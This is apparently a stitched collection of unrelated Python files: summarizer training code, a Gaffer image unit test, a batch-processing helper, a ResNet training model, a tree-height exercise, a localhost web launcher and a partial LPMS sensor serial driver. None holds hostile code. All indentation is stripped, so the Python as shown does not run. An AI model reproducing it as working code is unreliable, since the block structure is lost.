cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test_ext(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = ExtSummarizer(args, device, checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
trainer = build_trainer(args, device_id, model, None)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test_ext(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = ExtSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, model, None)
trainer.test(test_iter, step)
def train_ext(args, device_id):
if (args.world_size > 1):
train_multi_ext(args)
else:
train_single_ext(args, device_id)
def train_single_ext(args, device_id):
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
else:
checkpoint = None
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = ExtSummarizer(args, device, checkpoint)
optim = model_builder.build_optim(args, model, checkpoint)
logger.info(model)
trainer = build_trainer(args, device_id, model, optim)
try:
trainer.train(train_iter_fct, args.train_steps)
finally:
trainer.close_writer()
|
ImageNodeTest.py
|
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import unittest
import threading
import imath
import IECore
import Gaffer
import GafferTest
import GafferImage
import GafferImageTest
class ImageNodeTest( GafferImageTest.ImageTestCase ) :
def testCacheThreadSafety( self ) :
c = GafferImage.Constant()
c["format"].setValue( GafferImage.Format( 200, 200, 1.0 ) )
g = GafferImage.Grade()
g["in"].setInput( c["out"] )
g["multiply"].setValue( imath.Color3f( 0.4, 0.5, 0.6 ) )
gradedImage = g["out"].image()
# not enough for both images - will cause cache thrashing
Gaffer.ValuePlug.setCacheMemoryLimit( 2 * g["out"].channelData( "R", imath.V2i( 0 ) ).memoryUsage() )
images = []
exceptions = []
def grader() :
try :
images.append( g["out"].image() )
except Exception, e :
exceptions.append( e )
def processer() :
try :
GafferImageTest.processTiles( g["out"] )
except Exception, e :
exceptions.append( e )
graderThreads = []
for i in range( 0, 10 ) :
thread = threading.Thread( target = grader )
graderThreads.append( thread )
thread.start()
for thread in graderThreads :
thread.join()
for image in images :
self.assertEqual( image, gradedImage )
processerThreads = []
for i in range( 0, 10 ) :
thread = threading.Thread( target = processer )
processerThreads.append( thread )
thread.start()
for thread in processerThreads :
thread.join()
for e in exceptions :
raise e
def testNodesConstructWithDefaultValues( self ) :
self.assertNodesConstructWithDefaultValues( GafferImage )
self.assertNodesConstructWithDefaultValues( GafferImageTest )
def setUp( self ) :
GafferTest.TestCase.setUp( self )
self.__previousCacheMemoryLimit = Gaffer.ValuePlug.getCacheMemoryLimit()
def tearDown( self ) :
GafferTest.TestCase.tearDown( self )
Gaffer.ValuePlug.setCacheMemoryLimit( self.__previousCacheMemoryLimit )
if __name__ == "__main__":
unittest.main()
|
batch_process.py
|
from typing import List, Dict, Union, Callable
from math import ceil
from threading import Thread
from multiprocessing import Manager
from joblib import Parallel, delayed
from .progress_bar import progress_bar
from .task_wrapper import task_wrapper
def batch_process(
items: list,
function: Callable,
n_workers: int=8,
sep_progress: bool=False,
*args,
**kwargs,
) -> List[Dict[str, Union[str, List[str]]]]:
"""
Batch process a list of items
    The <items> are divided into n_workers batches, each processed
    individually using joblib. When done, all results are collected
    and returned as a single flattened list.
Parameters:
-----------
items : list
        List of items to batch process. This list will be divided into
        n_workers batches and processed by the function.
function : Callable
Function used to process each row. Format needs to be:
callable(item, *args, **kwargs).
n_workers : int (Default: 8)
        Number of worker processes to start. Generally there is an
        optimum with 1 <= n_workers <= total_cpus, as there is an
        overhead for creating separate processes.
sep_progress : bool (Default: False)
Show a separate progress bar for each worker.
*args, **kwargs : -
(named) arguments to pass to batch process function.
Returns:
--------
input_items : List [ Dict [ str, Union [ str, List [ str ]]]]
List of processed input_items with collected id, words,
tokens, and labels.
"""
# Divide data in batches
batch_size = ceil(len(items) / n_workers)
batches = [
items[ix:ix+batch_size]
for ix in range(0, len(items), batch_size)
]
# Check single or multiple progress bars
if sep_progress:
totals = [len(batch) for batch in batches]
else:
totals = len(items)
# Start progress bar in separate thread
manager = Manager()
queue = manager.Queue()
try:
progproc = Thread(target=progress_bar, args=(totals, queue))
progproc.start()
# Parallel process the batches
result = Parallel(n_jobs=n_workers)(
delayed(task_wrapper)
(pid, function, batch, queue, *args, **kwargs)
for pid, batch in enumerate(batches)
)
finally:
# Stop the progress bar thread
queue.put('done')
progproc.join()
# Flatten result
flattened = [item for sublist in result for item in sublist]
return flattened
|
model.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
import threading
import random
import tensorflow as tf
import torch
import torchvision as tv
import numpy as np
import skeleton
from architectures.resnet import ResNet9, ResNet18
from skeleton.projects import LogicModel, get_logger
from skeleton.projects.others import AUC, five_crop
torch.backends.cudnn.benchmark = True
threads = [
threading.Thread(target=lambda: torch.cuda.synchronize()),
threading.Thread(target=lambda: tf.Session())
]
[t.start() for t in threads]
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
# LOGGER = get_logger(__name__)
def set_random_seed_all(seed, deterministic=False):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
tf.random.set_random_seed(seed)
if deterministic:
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
class Model(LogicModel):
def __init__(self, metadata):
super(Model, self).__init__(metadata)
self.use_test_time_augmentation = False
self.update_transforms = False
def build(self):
base_dir = os.path.dirname(os.path.abspath(__file__))
in_channels = self.info['dataset']['shape'][-1]
num_class = self.info['dataset']['num_class']
[t.join() for t in threads]
self.device = torch.device('cuda', 0)
self.session = tf.Session()
Network = ResNet18
self.model = Network(in_channels, num_class)
self.model_pred = Network(in_channels, num_class).eval()
self.model_9 = ResNet9(in_channels, num_class)
self.model_9_pred = ResNet9(in_channels, num_class).eval()
if Network in [ResNet9, ResNet18]:
model_path = os.path.join(base_dir, 'models')
self.model.init(model_dir=model_path, gain=1.0)
self.model_9.init(model_dir=model_path, gain=1.0)
else:
self.model.init(gain=1.0)
self.model_9.init(gain=1.0)
self.model = self.model.to(device=self.device, non_blocking=True) # .half()
self.model_pred = self.model_pred.to(device=self.device, non_blocking=True) # .half()
self.model_9 = self.model_9.to(device=self.device, non_blocking=True) # .half()
self.model_9_pred = self.model_9_pred.to(device=self.device, non_blocking=True) # .half()
self.is_half = self.model._half
def update_model(self):
num_class = self.info['dataset']['num_class']
epsilon = min(0.1, max(0.001, 0.001 * pow(num_class / 10, 2)))
if self.is_multiclass():
self.model.loss_fn = torch.nn.BCEWithLogitsLoss(reduction='none')
self.tau = 8.0
else:
self.model.loss_fn = torch.nn.CrossEntropyLoss(reduction='none')
self.tau = 8.0
self.model_pred.loss_fn = self.model.loss_fn
self.init_opt()
def init_opt(self):
steps_per_epoch = self.hyper_params['dataset']['steps_per_epoch']
batch_size = self.hyper_params['dataset']['batch_size']
params = [p for p in self.model.parameters() if p.requires_grad]
        params_fc = [p for n, p in self.model.named_parameters() if
                     p.requires_grad and ('fc' == n[:2] or 'conv1d' == n[:6])]
params_not_fc = [p for n, p in self.model.named_parameters() if
p.requires_grad and not ('fc' == n[:2] or 'conv1d' == n[:6])]
init_lr = self.hyper_params['optimizer']['lr']
warmup_multiplier = 2.0
lr_multiplier = max(0.5, batch_size / 32)
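        # LR schedule: reduce-on-plateau on train_loss (patience 10, factor 0.5),
        # wrapped in a 5-epoch gradual warm-up scaled by `warmup_multiplier`.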
scheduler_lr = skeleton.optim.get_change_scale(
skeleton.optim.gradual_warm_up(
skeleton.optim.get_reduce_on_plateau_scheduler(
init_lr * lr_multiplier / warmup_multiplier,
patience=10, factor=.5, metric_name='train_loss'
),
warm_up_epoch=5,
multiplier=warmup_multiplier
),
init_scale=1.0
)
self.optimizer_fc = skeleton.optim.ScheduledOptimizer(
params_fc,
torch.optim.SGD,
steps_per_epoch=steps_per_epoch,
clip_grad_max_norm=None,
lr=scheduler_lr,
momentum=0.9,
weight_decay=0.00025,
nesterov=True
)
self.optimizer = skeleton.optim.ScheduledOptimizer(
params,
torch.optim.SGD,
steps_per_epoch=steps_per_epoch,
clip_grad_max_norm=None,
lr=scheduler_lr,
momentum=0.9,
weight_decay=0.00025,
nesterov=True
)
def adapt(self, remaining_time_budget=None):
epoch = self.info['loop']['epoch']
input_shape = self.hyper_params['dataset']['input']
height, width = input_shape[:2]
batch_size = self.hyper_params['dataset']['batch_size']
train_score = np.average([c['train']['score'] for c in self.checkpoints[-5:]])
valid_score = np.average([c['valid']['score'] for c in self.checkpoints[-5:]])
self.use_test_time_augmentation = self.info['loop']['test'] > 3
if self.hyper_params['conditions']['use_fast_auto_aug']:
self.hyper_params['conditions']['use_fast_auto_aug'] = valid_score < 0.995
if self.hyper_params['conditions']['use_fast_auto_aug'] and \
(train_score > 0.995 or self.info['terminate']) and \
remaining_time_budget > 120 and \
valid_score > 0.01 and \
self.dataloaders['valid'] is not None and \
not self.update_transforms:
self.update_transforms = True
self.last_predict = None
self.info['terminate'] = True
original_valid_policy = self.dataloaders['valid'].dataset.transform.transforms
policy = skeleton.data.augmentations.autoaug_policy()
num_policy_search = 100
num_sub_policy = 3
num_select_policy = 5
searched_policy = []
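            # Fast auto-augmentation search: sample random sub-policies, score each
            # on the validation loader, and keep only those that beat the current
            # validation score (collected into `searched_policy`).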
for policy_search in range(num_policy_search):
selected_idx = np.random.choice(list(range(len(policy))), num_sub_policy)
selected_policy = [policy[i] for i in selected_idx]
self.dataloaders['valid'].dataset.transform.transforms = original_valid_policy + [
lambda t: t.cpu().float() if isinstance(t, torch.Tensor) else torch.Tensor(t),
tv.transforms.ToPILImage(),
skeleton.data.augmentations.Augmentation(
selected_policy
),
tv.transforms.ToTensor(),
lambda t: t.to(device=self.device)
]
metrics = []
for policy_eval in range(num_sub_policy * 2):
valid_dataloader = self.build_or_get_dataloader('valid', self.datasets['valid'],
self.datasets['num_valids'])
valid_metrics = self.epoch_valid(self.info['loop']['epoch'], valid_dataloader, reduction='max')
metrics.append(valid_metrics)
loss = np.max([m['loss'] for m in metrics])
score = np.max([m['score'] for m in metrics])
searched_policy.append({
'loss': loss,
'score': score,
'policy': selected_policy
})
flatten = lambda l: [item for sublist in l for item in sublist]
searched_policy = [p for p in searched_policy if p['score'] > valid_score]
if len(searched_policy) > 0:
policy_sorted_index = np.argsort([p['score'] for p in searched_policy])[::-1][:num_select_policy]
policy = flatten([searched_policy[idx]['policy'] for idx in policy_sorted_index])
policy = skeleton.data.augmentations.remove_duplicates(policy)
original_train_policy = self.dataloaders['train'].dataset.transform.transforms
self.dataloaders['train'].dataset.transform.transforms += [
lambda t: t.cpu().float() if isinstance(t, torch.Tensor) else torch.Tensor(t),
tv.transforms.ToPILImage(),
skeleton.data.augmentations.Augmentation(
policy
),
tv.transforms.ToTensor(),
lambda t: t.to(device=self.device)
]
self.dataloaders['valid'].dataset.transform.transforms = original_valid_policy
self.hyper_params['optimizer']['lr'] /= 2.0
self.init_opt()
self.hyper_params['conditions']['max_inner_loop_ratio'] *= 3
self.hyper_params['conditions']['threshold_valid_score_diff'] = 0.00001
self.hyper_params['conditions']['min_lr'] = 1e-8
def activation(self, logits):
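        # Multi-label: per-class sigmoid with a 0.5 threshold.
        # Single-label: softmax over classes; the prediction is a one-hot at the argmax.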
if self.is_multiclass():
logits = torch.sigmoid(logits)
prediction = (logits > 0.5).to(logits.dtype)
else:
logits = torch.softmax(logits, dim=-1)
_, k = logits.max(-1)
prediction = torch.zeros(logits.shape, dtype=logits.dtype, device=logits.device).scatter_(-1, k.view(-1, 1),
1.0)
return logits, prediction
def epoch_train(self, epoch, train, model=None, optimizer=None):
model = model if model is not None else self.model
if epoch < 0:
optimizer = optimizer if optimizer is not None else self.optimizer_fc
else:
optimizer = optimizer if optimizer is not None else self.optimizer
model.train()
model.zero_grad()
num_steps = len(train)
metrics = []
if self.switch == True:
self.checkpoints = []
step = 0
for (examples, labels, original_labels) in (self.pre_data * 2):
logits, loss = model(examples, labels, tau=self.tau, reduction='avg')
loss = loss.sum()
loss.backward()
max_epoch = self.hyper_params['dataset']['max_epoch']
optimizer.update(maximum_epoch=max_epoch)
optimizer.step()
model.zero_grad()
logits, prediction = self.activation(logits.float())
auc = AUC(logits, original_labels.float())
score = auc
metrics.append({
'loss': loss.detach().float().cpu(),
'score': score,
})
step += 1
self.switch = False
del self.pre_data
else:
for step, (examples, labels) in enumerate(train):
if examples.shape[0] == 1:
examples = examples[0]
labels = labels[0]
original_labels = labels
if not self.is_multiclass():
labels = labels.argmax(dim=-1)
skeleton.nn.MoveToHook.to((examples, labels), self.device, self.is_half)
logits, loss = model(examples, labels, tau=self.tau, reduction='avg')
loss = loss.sum()
loss.backward()
max_epoch = self.hyper_params['dataset']['max_epoch']
optimizer.update(maximum_epoch=max_epoch)
optimizer.step()
model.zero_grad()
if self.info['loop']['epoch'] < 2:
self.pre_data.append((examples, labels, original_labels))
logits, prediction = self.activation(logits.float())
auc = AUC(logits, original_labels.float())
score = auc
metrics.append({
'loss': loss.detach().float().cpu(),
'score': score,
})
train_loss = np.average([m['loss'] for m in metrics])
train_score = np.average([m['score'] for m in metrics])
optimizer.update(train_loss=train_loss)
return {
'loss': train_loss,
'score': train_score,
}
def epoch_valid(self, epoch, valid, reduction='avg'):
test_time_augmentation = False
self.model.eval()
num_steps = len(valid)
metrics = []
tau = self.tau
with torch.no_grad():
for step, (examples, labels) in enumerate(valid):
original_labels = labels
if not self.is_multiclass():
labels = labels.argmax(dim=-1)
batch_size = examples.size(0)
if self.use_test_time_augmentation and test_time_augmentation:
examples = torch.cat([examples, torch.flip(examples, dims=[-1])], dim=0)
labels = torch.cat([labels, labels], dim=0)
logits, loss = self.model(examples, labels, tau=tau, reduction=reduction)
if self.use_test_time_augmentation and test_time_augmentation:
logits1, logits2 = torch.split(logits, batch_size, dim=0)
logits = (logits1 + logits2) / 2.0
logits, prediction = self.activation(logits.float())
if reduction == 'avg':
auc = AUC(logits, original_labels.float())
else:
auc = max([AUC(logits[i:i + 16], original_labels[i:i + 16].float()) for i in
range(int(len(logits)) // 16)])
score = auc
metrics.append({
'loss': loss.detach().float().cpu(),
'score': score,
})
if reduction == 'avg':
valid_loss = np.average([m['loss'] for m in metrics])
valid_score = np.average([m['score'] for m in metrics])
elif reduction in ['min', 'max']:
valid_loss = np.min([m['loss'] for m in metrics])
valid_score = np.max([m['score'] for m in metrics])
else:
raise Exception('not support reduction method: %s' % reduction)
self.optimizer.update(valid_loss=np.average(valid_loss))
return {
'loss': valid_loss,
'score': valid_score,
}
def skip_valid(self, epoch):
return {
'loss': 99.9,
'score': epoch * 1e-4,
}
def prediction(self, dataloader, model=None, test_time_augmentation=True, detach=True, num_step=None):
tau = self.tau
if model is None:
model = self.model_pred
best_idx = np.argmax(np.array([c['valid']['score'] for c in self.checkpoints]))
best_loss = self.checkpoints[best_idx]['valid']['loss']
best_score = self.checkpoints[best_idx]['valid']['score']
states = self.checkpoints[best_idx]['model']
model.load_state_dict(states)
num_step = len(dataloader) if num_step is None else num_step
model.eval()
with torch.no_grad():
predictions = []
for step, (examples, labels) in zip(range(num_step), dataloader):
batch_size = examples.size(0)
height = int(examples.size(2) * 3 / 4)
width = int(examples.size(3) * 3 / 4)
if self.use_test_time_augmentation and test_time_augmentation:
examples1 = torch.cat([examples, torch.flip(examples, dims=[-1])], dim=0)
logits_1 = model(examples1, tau=tau)
logits1, logits2 = torch.split(logits_1, batch_size, dim=0)
logits = (logits1 + logits2) / 2.0
else:
logits = model(examples, tau=tau)
logits, prediction = self.activation(logits)
if detach:
predictions.append(logits.detach().float().cpu().numpy())
else:
predictions.append(logits)
if detach:
predictions = np.concatenate(predictions, axis=0).astype(np.float)
else:
predictions = torch.cat(predictions, dim=0)
return predictions
|
tree_height.py
|
# python3
import sys
import threading
from collections import deque
class Node:
def __init__(self, value):
self.val = value
self.childs = []
def addChild(self, child):
self.childs.append(child)
def cal(arr, i):
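    # Height of the subtree rooted at node i; a leaf counts as height 1.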
if len(arr[i].childs) == 0:
return 1
val = -1
for j in range(len(arr[i].childs)):
val = max(val, cal(arr, arr[i].childs[j]))
return 1 + val
def compute_height(n, parents):
# Replace this code with a faster implementation
arr = [Node(i) for i in range(n)]
# for i in range(n):
# arr[i] = Node(i)
root = -1
for vertex in range(n):
current = parents[vertex]
if current == -1:
            root = vertex
else:
arr[current].addChild(vertex)
# print(root)
# for i in range(n):
# print(i, end=' ')
# print(arr[i].childs)
return cal(arr, root)
def main():
n = int(input())
parents = list(map(int, input().split()))
print(compute_height(n, parents))
# In Python, the default limit on recursion depth is rather low,
# so raise it here for this problem. Note that to take advantage
# of bigger stack, we have to launch the computation in a new thread.
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
threading.Thread(target=main).start()
|
application.py
|
'''
Created on Jul 24, 2014
@author: gigemjt
'''
import time
from src.connection import server
import BaseHTTPServer
from src.utilities import system
import webbrowser
import threading
HOST_NAME = 'localhost' # !!!REMEMBER TO CHANGE THIS FOR REMOTE CONNECTION!!!
PORT_NUMBER = 9000 # Maybe set this to 9000.
CONST_REMOTE = False
CONST_DEFAULT_PAGE = "/web/index.html"
class DevelopmentGraph():
def __init__(self):
t = threading.Thread(target = self.openWebpage)
t.daemon = True
t.start()
try :
self.createServer()
except:
time.sleep(5)
def createServer(self):
server_class = BaseHTTPServer.HTTPServer
httpd = server_class((HOST_NAME, PORT_NUMBER), server.RequestHandler)
print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER)
print 'starting server!'
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)
def openWebpage(self):
print "Waiting for server to start"
time.sleep(3)
controller = None
try:
if system.isMac() :
controller = webbrowser.get("open -a /Applications/Google\ Chrome.app %s")
elif system.isLinux():
controller = webbrowser.get('/usr/bin/google-chrome %s')
elif system.isWindows():
controller = webbrowser.get('chrome')
except :
            controller = webbrowser.get()  # grabs the default (hoping that it is chrome)
print 'opening browser'
try:
            controller.open('http://' + HOST_NAME + ":" + str(PORT_NUMBER) + CONST_DEFAULT_PAGE, 2)
except Exception:
print 'EXCEPTION'
print 'window opened'
if __name__ == '__main__':
DevelopmentGraph()
|
LpmsME.py
|
import time
import serial
import threading
import struct
import sys
from datetime import datetime, timedelta
from LpmsConfig import *
from lputils import *
from LpmsConfigurationSettings import LpmsConfigurationSettings
#TODO:
# check serial port opened before executing commands
# add wait for ack routine
class LpmsME(object):
TAG = "LPMSME"
    runOnce = True
verbose = True
is_thread_running = False
sensor_configuration = LpmsConfigurationSettings()
PACKET_ADDRESS0 = 0
PACKET_ADDRESS1 = 1
PACKET_FUNCTION0 = 2
PACKET_FUNCTION1 = 3
PACKET_RAW_DATA = 4
PACKET_LRC_CHECK0 = 5
PACKET_LRC_CHECK1 = 6
PACKET_END = 7
PACKET_LENGTH0 = 8
PACKET_LENGTH1 = 9
current_length = 0
current_function = 0
current_address = 0
rx_state = PACKET_END
in_bytes = []
rx_buffer = []
raw_tx_data = []
rx_index = 0
lrc_check = 0
wait_for_ack = False
wait_for_data = False
is_sensor_connected = False
is_command_mode = False
config_register = 0
status_register = 0
imu_id = 0
timestamp = 0
frame_counter = 0
battery_level = 0
battery_voltage = 0
temperature = 0
acc_x = 0
acc_y = 0
acc_z = 0
gyr_x = 0
gyr_y = 0
gyr_z = 0
mag_x = 0
mag_y = 0
mag_z = 0
angular_vel_x = 0
angular_vel_y = 0
angular_vel_z = 0
quat_w = 0
quat_x = 0
quat_y = 0
quat_z = 0
euler_x = 0
euler_y = 0
euler_z = 0
linacc_x = 0
linacc_y = 0
linacc_z = 0
altitude = 0
pressure = 0
humidity = 0
# debug log
debug_log_size = 0
debug_log_size_index = 0
def __init__(self, port, baudrate):
self.port = port
self.baudrate = baudrate
self.__init_params()
def __clear_params(self):
self.current_length = 0
self.current_function = 0
self.current_address = 0
self.rx_state = self.PACKET_END
self.in_bytes = []
self.rx_buffer = []
self.raw_tx_data = []
self.rx_index = 0
self.lrc_check = 0
self.imu_id = 0
self.timestamp = 0
self.frame_counter = 0
self.battery_level = 0
self.battery_voltage = 0
self.temperature = 0
self.acc_x = 0
self.acc_y = 0
self.acc_z = 0
self.gyr_x = 0
self.gyr_y = 0
self.gyr_z = 0
self.mag_x = 0
self.mag_y = 0
self.mag_z = 0
self.angular_vel_x = 0
self.angular_vel_y = 0
self.angular_vel_z = 0
self.quat_w = 0
self.quat_x = 0
self.quat_y = 0
self.quat_z = 0
self.euler_x = 0
self.euler_y = 0
self.euler_z = 0
self.linacc_x = 0
self.linacc_y = 0
self.linacc_z = 0
self.altitude = 0
self.pressure = 0
self.humidity = 0
self.wait_for_ack = False
self.wait_for_data = False
def __init_params(self):
self.__clear_params()
def __thread_is_alive(self):
try:
return self.thread.isAlive()
except AttributeError:
return False
def __run(self):
""" Method that runs forever """
self.is_thread_running = True
while not self.quit:
self.is_sensor_connected = True
bytesToRead = self.serial_port.inWaiting()
if bytesToRead > 0:
reading = self.serial_port.read(bytesToRead)
#print reading
self.__parse(reading)
self.serial_port.close()
self.is_sensor_connected = False
self.is_thread_running = False
# TODO: add offset length check
def __convert_rxbytes_to_int16(self, offset, dataList):
"""
dataList is a list
"""
(i,) = struct.unpack("h", ''.join(dataList[offset:offset+2]))
return i
def __convert_rxbytes_to_int(self, offset, dataList):
"""
dataList is a list
"""
(i,) = struct.unpack("i", ''.join(dataList[offset:offset+4]))
return i
def __convert_rxbytes_to_float(self, offset, dataList):
"""
dataList is a list
"""
(i,) = struct.unpack("f", ''.join(dataList[offset:offset+4]))
return i
def __convert_int16_to_txbytes(self, v):
"""
return bytesarray
"""
return struct.pack("h", v)
def __convert_int_to_txbytes(self, v):
"""
return bytesarray
"""
return struct.pack("i", v)
def __print_str_to_hex(self, s):
print ":".join("{:02x}".format(ord(c)) for c in s)
# Parser
def __parse_function(self):
cf = self.current_function
if cf == LPMS_ACK:
logd(self.TAG , "Received Ack")
self.wait_for_ack = False
elif cf == LPMS_NACK:
logd(self.TAG , "Received Nack")
self.wait_for_ack = False
elif cf == LPMS_GET_CONFIG:
self.config_register = self.__convert_rxbytes_to_int(0, self.rx_buffer)
#print"{0:b}".format(self.config_register).zfill(32)
self.__parse_configuration_register(self.config_register)
self.wait_for_data = False
elif cf == LPMS_GET_SENSOR_DATA:
if self.sensor_configuration.sixteen_bit_data_enable:
self.__parse_sensor_data(16)
else:
self.__parse_sensor_data()
self.wait_for_data = False
elif cf == GET_BATTERY_LEVEL:
self.battery_level = self.__convert_rxbytes_to_float(0, self.rx_buffer)
self.wait_for_data = False
elif cf == GET_CHARGING_STATUS:
self.chargingStatus = self.__convert_rxbytes_to_int(0, self.rx_buffer)
self.wait_for_data = False
elif cf == GET_BATTERY_VOLTAGE:
self.battery_voltage = self.__convert_rxbytes_to_float(0, self.rx_buffer)
self.wait_for_data = False
elif cf == GET_FIRMWARE_VERSION:
vmajor = self.__convert_rxbytes_to_int(8, self.rx_buffer)
vminor = self.__convert_rxbytes_to_int(4, self.rx_buffer)
vbuild = self.__convert_rxbytes_to_int(0, self.rx_buffer)
self.firmwareVersion = str(vmajor) + "." + str(vminor) + "." + str(vbuild)
self.wait_for_data = False
elif cf == GET_PING:
if self.sensor_configuration.timestamp_counter_mode_enable:
self.timestamp = self.__convert_rxbytes_to_int(0, self.rx_buffer)
else:
self.timestamp = self.__convert_rxbytes_to_float(0, self.rx_buffer)
elif cf == GET_TEMPERATURE:
self.temperature = self.__convert_rxbytes_to_float(0, self.rx_buffer)
self.wait_for_data = False
elif cf == GET_DEBUG_LOGGING_STATUS:
self.debugLoggingStatus = self.__convert_rxbytes_to_int(0, self.rx_buffer)
logd(self.TAG , "Debug Logging Status: "+str(self.debugLoggingStatus))
self.wait_for_data = False
elif cf == GET_DEBUG_LOG_SIZE:
self.debug_log_size = self.__convert_rxbytes_to_int(0, self.rx_buffer) / 32
logd(self.TAG , "Debug Logging Size: "+str(self.debug_log_size))
self.wait_for_data = False
elif cf == GET_DEBUG_LOG:
log = str(self.__convert_rxbytes_to_int(0, self.rx_buffer)) + ','
log += str(float(self.__convert_rxbytes_to_int16(4, self.rx_buffer))/100) + ','
log += str(float(self.__convert_rxbytes_to_int16(6, self.rx_buffer))/1000) + ','
log += str(self.__convert_rxbytes_to_float(8, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(12, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(16, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(20, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(24, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(28, self.rx_buffer))
if self.debug_log_size_index == 0:
filename = "DebugLog-"+datetime.now().strftime("%Y%m%d-%H%M%S")+".csv"
logd(self.TAG , "Saving to "+ filename)
self.fo = open(filename, "wb")
self.startTime = datetime.now()
self.fo.write(log+'\n')
self.debug_log_size_index += 1
self.__update_progress(self.debug_log_size_index)
if self.debug_log_size_index >= self.debug_log_size:
self.fo.close()
dt = (datetime.now()-self.startTime).total_seconds()
print
logd(self.TAG , "Debug log download completed")
print "Elapsed time:", str(dt)
def __update_progress(self, progress):
percent = int(progress*100/self.debug_log_size)
sys.stdout.write("\rDownloading: %d%%, %d, %d" % (percent, progress, self.debug_log_size))
sys.stdout.flush()
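    # Packet framing, as inferred from the state machine in __parse below
    # (a sketch of the wire format rather than an authoritative spec):
    #   ':'      start byte
    #   2 bytes  sensor address (imu_id)
    #   2 bytes  function/command id
    #   2 bytes  payload length
    #   N bytes  payload
    #   2 bytes  LRC checksum (sum of address, function, length and payload bytes)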
def __parse(self, data):
self.lrcReceived = 0
for b in data:
if self.rx_state == self.PACKET_END:
if (b == ':'):
self.rx_state = self.PACKET_ADDRESS0
elif self.rx_state == self.PACKET_ADDRESS0:
self.in_bytes = []
self.in_bytes.append(b)
self.rx_state = self.PACKET_ADDRESS1
elif self.rx_state == self.PACKET_ADDRESS1:
self.in_bytes.append(b)
self.current_address = self.__convert_rxbytes_to_int16(0, self.in_bytes)
self.imu_id = self.current_address
